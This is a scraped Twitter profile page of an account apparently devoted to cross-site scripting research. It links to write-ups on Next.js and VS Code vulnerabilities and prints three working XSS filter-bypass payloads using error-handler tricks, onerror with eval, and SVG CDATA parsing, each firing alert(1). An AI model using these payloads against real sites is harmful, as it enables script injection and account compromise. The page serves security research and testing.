XSS Payloads (@xsspayloads) 's Twitter Profile
XSS Payloads

@xsspayloads

ID: 2893592123

linkhttps://xss-payloads.paracyberbellum.io calendar_today26-11-2014 17:54:23

1,1K Tweet

49,49K Followers

0 Following

XSS Payloads (@xsspayloads) 's Twitter Profile Photo

Eclipse on Next.js: Conditioned exploitation of an intended race-condition, nice exploitation of Next.js race condition leading to stored XSS, by zhero; zhero-web-sec.github.io/research-and-t…

XSS Payloads (@xsspayloads) 's Twitter Profile Photo

Breaking Out of Restricted Mode: XSS to RCE in Visual Studio Code, nice finding by Devesh Logendran starlabs.sg/blog/2025/05-b…

XSS Payloads (@xsspayloads) 's Twitter Profile Photo

An URIError spoofing-based vector, by 0x999 🇮🇱 inspired by terjanq ondevicemotion=setTimeout; Event.prototype.toString=URIError.prototype.toString; Event.prototype.message='alert\x281\x29'

XSS Payloads (@xsspayloads) 's Twitter Profile Photo

A payload that plays with error handlers by 0x999 🇮🇱 <img/src/onerror=window.onerror=eval;ReferenceError.prototype.name=';alert\x281\x29;var\x20Uncaught//';z>

XSS Payloads (@xsspayloads) 's Twitter Profile Photo

A payload for Chrome and Forefox by Gareth Heyes \u2028, found with Hacking Rooms: thespanner.co.uk/hacking-rooms <svg><title><![CDATA[--></title><img src onerror=alert(1)>]]>